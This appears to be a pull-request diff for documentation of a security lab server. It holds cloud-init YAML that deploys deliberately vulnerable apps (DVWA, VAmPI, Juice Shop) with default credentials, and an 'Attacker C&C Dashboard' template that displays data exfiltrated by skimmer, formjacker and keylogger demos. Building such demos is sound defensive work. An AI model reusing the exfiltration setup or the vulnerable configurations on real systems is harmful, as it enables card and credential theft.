+          .card { background: #16213e; border-color: #0f3460; }
+          .card-header { background: #0f3460; }
+          .badge-skimmer { background: #dc3545; }
+          .badge-formjacker { background: #fd7e14; }
+          .badge-keylogger { background: #ffc107; color: #000; }
+          .badge-cryptominer { background: #198754; }
+          .badge-dom-hijack { background: #6f42c1; }
+          pre { background: #0d1117; color: #58a6ff; padding: 10px; border-radius: 4px; font-size: 0.8rem; max-height: 200px; overflow-y: auto; }
+          .header-bar { background: #dc3545; padding: 15px 0; margin-bottom: 20px; }
+        </style>
+      </head>
+      <body>
+        <div class="header-bar text-center">
+          <h4 class="text-white mb-0">Attacker C&amp;C Dashboard</h4>
+          <small class="text-white-50">Exfiltrated data from CSD demo checkout page</small>
+        </div>
+
+        <div class="container-fluid px-4">
+          <div class="d-flex justify-content-between align-items-center mb-3">
+            <h5>Captured Data ({{ entries|length }} entries)</h5>
+            <div>
+              <button class="btn btn-sm btn-outline-light" onclick="location.reload()">Refresh</button>
+              <button class="btn btn-sm btn-outline-danger" onclick="clearAndReload()">Clear All</button>
+            </div>
+          </div>
+
+          {% if entries %}
+          {% for entry in entries|reverse %}
+          <div class="card mb-3">
+            <div class="card-header d-flex justify-content-between align-items-center">
+              <span>
+                <span class="badge badge-{{ entry.attack_type }}">{{ entry.attack_type }}</span>
+                {{ entry.timestamp }}
+              </span>
+              <small>{{ entry.source_ip }}</small>
+            </div>
+            <div class="card-body">
+              <pre>{{ entry.payload | tojson(indent=2) if entry.payload is mapping else entry.payload }}</pre>
+            </div>
+          </div>
+          {% endfor %}
+          {% else %}
+          <div class="text-center py-5">
+            <h5 class="text-muted">No data captured yet</h5>
+            <p class="text-muted">Enable attacks on the checkout page and interact with the form.</p>
+          </div>
+          {% endif %}
+        </div>
+
+        <script>
+        function clearAndReload() {
+          fetch("/exfil/clear", { method: "POST" }).then(() => location.reload());
+        }
+        setTimeout(() => location.reload(), 5000);
+        </script>
+      </body>
+      </html>
+
 runcmd:
   # Enable sysstat collection (sar history)
   - sed -i 's/ENABLED="false"/ENABLED="true"/' /etc/default/sysstat
@@ -736,16 +1466,18 @@ runcmd:
   - apt-get install -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
   - systemctl enable docker
   - systemctl start docker
-  # nginx (systemd limits applied via write_files above)
+  # nginx cache directory and systemd limits
+  - mkdir -p /var/cache/nginx/juice_shop
+  - chown www-data:www-data /var/cache/nginx/juice_shop
   - systemctl daemon-reload
   - ln -sf /etc/nginx/sites-available/origin-server /etc/nginx/sites-enabled/origin-server
   - rm -f /etc/nginx/sites-enabled/default
   - nginx -t
   - systemctl enable nginx
-  # Start containers
+  # Build custom images and start all containers
+  - cd /opt/origin-server && docker compose build
   - cd /opt/origin-server && docker compose up -d
   - sleep 60
-  - for i in 1 2 3 4; do docker exec vampi-$i python -c "from config import db, vuln_app; vuln_app.app.app_context().__enter__(); db.create_all()" 2>/dev/null; done
   # DVWA database setup (create tables via HTTP setup endpoint)
   - |
     for i in $(seq 1 30); do
@@ -755,8 +1487,6 @@ runcmd:
   - |
     TOKEN=$(curl -sf http://127.0.0.1:8101/setup.php | grep -oP "user_token.*?value='\K[a-f0-9]+" | head -1)
     curl -sf -X POST http://127.0.0.1:8101/setup.php -d "create_db=Create+%2F+Reset+Database&user_token=${TOKEN}" -c /tmp/dvwa-setup -b /tmp/dvwa-setup
-  - docker build -t csd-demo:latest /opt/origin-server/csd-demo/
-  - docker run -d --name csd-demo --restart unless-stopped -p 127.0.0.1:5001:5001 csd-demo:latest
   - systemctl restart nginx
 ```
 
@@ -824,7 +1554,7 @@ Create `terraform.tfvars.example`:
 subscription_id     = "00000000-0000-0000-0000-000000000000"
 resource_group_name = "rg-origin-server"
 location            = "eastus2"
-vm_size             = "Standard_B2ms"
+vm_size             = "Standard_D16s_v3"
 admin_username      = "azureuser"
 ssh_public_key_path = "~/.ssh/id_ed25519.pub"
 environment_tag     = "lab"
@@ -870,10 +1600,7 @@ Expected response:
 DVWA requires a one-time database initialization. Open `http://<PUBLIC_IP>/dvwa/setup.php` in a browser and click **Create / Reset Database**. Default credentials are `admin` / `password`.
 
 :::note
-VAmPI's SQLite database is automatically initialized by cloud-init. If VAmPI returns 500 errors, SSH into the VM and run:
-```bash
-sudo docker exec vampi python -c "from config import db, vuln_app; vuln_app.app.app_context().__enter__(); db.create_all()"
-```
+VAmPI's SQLite database is automatically initialized by its gunicorn entrypoint script. Each container runs `db.create_all()` on startup, so no manual intervention is needed.
 :::
 
 Proceed to [Applications](../04-applications/) for usage guides or [Verify](../05-verify/) for smoke tests.


### PR DESCRIPTION
## Summary

- Sync cloud-init YAML template with live origin server (20.12.78.159) for 500 automated replica deployments
- VM size upgraded from Standard_B2ms to Standard_D16s_v3 (16 vCPU, 64 GiB)
- Add Nginx sticky sessions (ip_hash for VAmPI/CSD, hash cookie for Juice Shop/DVWA) and proxy cache for Juice Shop
- Replace DVWA Apache with custom php-fpm build, add VAmPI gunicorn entrypoint, httpbin CMD override, CSD demo full source inline with gunicorn -w 1
- Fix SQLite per-instance isolation (ip_hash on VAmPI upstream) and exfil log null entries (ip_hash + single gunicorn worker on CSD)

Closes #32

## Test plan

- [ ] CI checks pass (Check linked issues + Lint Code Base)
- [ ] Cloud-init YAML renders correctly in the docs site
- [ ] Nginx upstream blocks contain correct sticky session directives
- [ ] Docker service definitions match live server configuration
- [ ] CSD demo inline source (app.py + templates) is syntactically valid